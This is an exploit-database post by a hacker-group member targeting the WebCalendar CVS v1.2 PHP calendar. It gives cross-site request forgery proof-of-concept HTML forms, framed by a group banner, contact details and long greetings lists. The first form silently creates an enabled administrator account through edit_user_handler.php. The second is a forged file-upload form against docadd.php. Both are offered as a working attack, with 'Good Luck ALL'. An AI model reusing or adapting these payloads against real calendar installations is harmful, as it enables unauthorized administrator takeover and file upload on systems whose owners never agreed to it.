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WebCalendar CVS v1.2 Multiple (CSRF/XSRF) Vulnerabilities

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0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
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1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0

# Title : WebCalendar CVS v1.2 Multiple (CSRF/XSRF) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans | http://kedans.dis9.com
# platform : php
# Impact : Multiple (CSRF/XSRF)
# Tested on : Windows XP SP3 (Fr)
# [Indoushka] => Welcome back Br0ther <3 ^^
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..

# Download : [http://www.k5n.us/files/webcalendar-cvs.tar.gz]

# (+) Exploit :

#==(1)==[ Add New User ]====>

<form action="http://site/edit_user_handler.php" name="edituser" method="post">
<input type="hidden" name="formtype" value="edituser" />
<input type="text" name="ufirstname" id="ufirstname" size="20" value="Ked" />
<input type="text" name="ulastname" id="ulastname" size="20" value="Ans" />
<input type="text" name="uemail" id="uemail" size="20" value="ked-h@hotmail.com" />
<input name="upassword1" id="pass1" size="15" value="" type="password" />
<input name="upassword2" id="pass2" size="15" value="" type="password" />
<input type="hidden" name="uenabled" value="Y" />
<input type="hidden" name="uis_admin" value="Y" />
<input type="hidden" name="u_enabled" value="Y" />
<input type="submit" value="Save & Submit" />

#==(2)==[ Upload File via XSRF ]==>

<form action="docadd.php" method="post" name="docform" enctype="multipart/form-data">
<input type="hidden" name="id" value="<?php echo $id?>" />
<input type="hidden" name="type" value="A" />
<tr class="browse"><td>
<input type="file" name="FileName" id="fileupload" size="45" maxlength="50" />
<input type="text" name="description" size="30" maxlength="100" /></td></tr>
<td colspan="2">
<input type="submit" value="Upload & Submit" /></td></tr>

# (^_^) ! Good Luck ALL ...

# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |

#================[ Exploited By KedAns-Dz * Inj3ct0r * ]========================================= 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > + Rizky Ariestiyansyah * 1850 BBs
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team)
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * PaCketStorm Team (www.packetstormsecurity.org) * TreX (hotturks.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ..
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever 
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz

#  0day.today [2024-09-28]  #